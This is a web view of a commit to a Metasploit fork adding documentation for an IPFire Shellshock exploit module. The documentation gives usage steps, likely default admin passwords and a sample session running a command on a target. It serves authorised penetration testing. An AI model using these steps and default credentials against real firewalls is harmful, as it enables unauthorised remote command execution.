adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

first add of ipfire shellshock

Browse Source
This commit is contained in:
h00die
2016-05-29 20:40:12 -04:00
parent 13adc3ee0a
commit df55f9a57c
2 changed files with 160 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/linux/http/ipfire_bashbug_exec.md
+47
View File
@@ -0,0 +1,47 @@
The following is the recommended format for module documentation.
But feel free to add more content/sections to this.
## Vulnerable Application
Official Source: [ipfire](http://downloads.ipfire.org/releases/ipfire-2.x/2.15-core82/ipfire-2.15.i586-full-core82.iso)
Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)
## Verification Steps
Example steps in this format:
1. Install the firewall
2. Start msfconsole
3. Do: ```use exploit/linux/http/ipfire_bashbug_exec```
4. Do: ```set rhost 10.10.10.10```
5. Do: ```set CMD ls```
6. Do: ```run```
7. You should see the output of the command that was run.
## Options
**PASSWORD**
Password is set at install. May be blank, 'admin', or 'ipfire'.
**CMD**
This is the command to run on the system.
## Scenarios
Example of running the ID command
```
msf > use exploit/linux/http/ipfire_bashbug_exec
msf exploit(ipfire_bashbug_exec) > set PASSWORD admin
PASSWORD => admin
msf exploit(ipfire_bashbug_exec) > set rhost 192.168.2.202
rhost => 192.168.2.202
msf exploit(ipfire_bashbug_exec) > set CMD id
CMD => id
msf exploit(ipfire_bashbug_exec) > exploit
[+] uid=99(nobody) gid=99(nobody) groups=16(dialout),23(squid),99(nobody)
[*] Exploit completed, but no session was created.
```